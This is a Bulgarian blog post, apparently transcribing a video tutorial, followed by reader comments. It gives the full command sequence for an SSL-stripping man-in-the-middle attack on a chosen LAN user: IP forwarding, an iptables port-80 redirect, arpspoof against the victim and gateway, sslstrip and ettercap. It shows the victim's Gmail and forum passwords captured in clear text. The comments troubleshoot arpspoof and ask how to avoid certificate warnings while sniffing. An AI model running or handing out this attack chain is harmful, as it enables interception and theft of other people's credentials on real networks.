Здравейте отново от мен Мартин Петров и както винаги тази видео демонстрация е създадена с учебна цел. Авторът не носи отговорност за потенциални щети нанесени от демонстрацията.
Сега ще ви демонстрирам как можете да подслушвате SSL връзки или SSL Hijachking чрез sslstrip от Moxie Marlinspike.
Преди всичко трябва да сканираме своята мрежа и да си изберем потребител на които ще подслушваме SSL връзката.
Отваряме терминал едно и сканираме нашата мрежа
Избираме потребител с IP адрес 192.168.1.100
Сега ще се подготвим за нашият SSL Hijacking като отварим терминал 1 и редактираме /etc/etter.conf
Позволяваме форвардинг
echo 1 > /proc/sys/net/ipv4/ip_forward
Сега пренасочваме порт 80 към 10 000 с iptables
iptables -t nat -A PREROUTNIG -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Сега изпълняваме arp спуфинг
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
В терминал две стартираме sslstrip с аргумент -a -k -f
sslstrip -a -k -f
И в терминал 3 стартираме ettercap за да видим резултата от всичко това :)
ettercap -T -q -i eth0
Хайде сега да наблюдаваме машината на потребителя
Сега потребителят ще отвори сайт с криптирана връзка HTTPS. Например gmail: https://mail.google.com
Въвежда примерно потребителско име и парола
Ще погледнем ettercap в нашата машина. Виждаме потребителското име и паролата които потребителя въведе по- рано. Всичко се вижда в чист текст като се има впредвид, че връзката беше реализирана чрез https.
По същия начин могат да се прослушват и нормални връзки към страници работещи на 80-ти порт.
Сега потребителя ще отвори уеб сайта arenabg.com и ще въведе примерно потребителско име и парола
Отново виждаме потребителското име и парола.
Видео демонстрация SSL Hijacking:
1. Видео демонстрация качена във vbox
2. Видео демонстрация качена във youtube
Здравей, как можем да си защитим компютъра от такъв вид прослушване?
Здравейте.Подкарах Бактрак 4 с Виртуалбокс,имах доста проблеми с пускането на нета,но с приятелска помощ успяхме.Направих няколко опита SSL Hijacking с учебна цел като следвам стапка по стапка всичко както е показано,но в терминал 1 при командата arpspoof -i eth0 -t 192.168.1.160 (IP на моя гейтуей) всеки път ми изписва arpspoof: couldn't arp for host 192.168.160 Някой може ли да ми каже защо се получава така?Да не баркам аз някаде,но всичко го изпалнявам както е показано.Пробвах и с други IP-та и пак сащото ми изписва.На видео материала не излиза такова нещо след изпалнение на тази команда.Следователно има нещо нередно.Благодаря предварително
При мен работи.но го правя на ВИФИ карта,,не на лан,,,защото си мисля че ако го направя с лан картата на гейтуей ми,,И-нет доставчика ми ще ми спре нета точно за 5мин. Доста заявки започват да минават през компа ми ,а доставчика си има защити :)
Но да кажа че и на мен понякога ми исписва "couldn't arp for host",,нямам предства какво е!! но порових малко из иу-тубе.ком и намерих доста по лесен начин за "снифинг",,директно с програма и бутони ето : http://www.youtube.com/profile?feature=iv&annotation_id=annotation_948913&user=H34dcr4b#p/u/14/Iiq1VSg_dyw
по лесно е,,без писане :)
Л.М. Мартине,дето има една дума "заеба" го тоя блог,,,или по точно не отговаряш на потребителите за които си направил този блог
Ivoo линка ти към youtube.com е вече неактивен :)
Имам въпрос, тествам точно това за курсова работа по "Мрежова Сигурност"
Всичко тръгна повече от добре на виртуалната машина всички тестове минаха успешно, но искам да изключа снифенето на https въобще когато има заявка към страница https да я пропуска, причината е невалидният сертификат който трябва да приеме потребителят. Та самият въпрос е: как да се снифи трафика без SSL и да не изкарва на потребителя съобщението за приемане на невалидният сертификат. Т.е стигнем ли до SLL заявка да я пропуска и да се използва оригиналният сертификат (целта на теста е обикновенният трафик, а не този през SSL)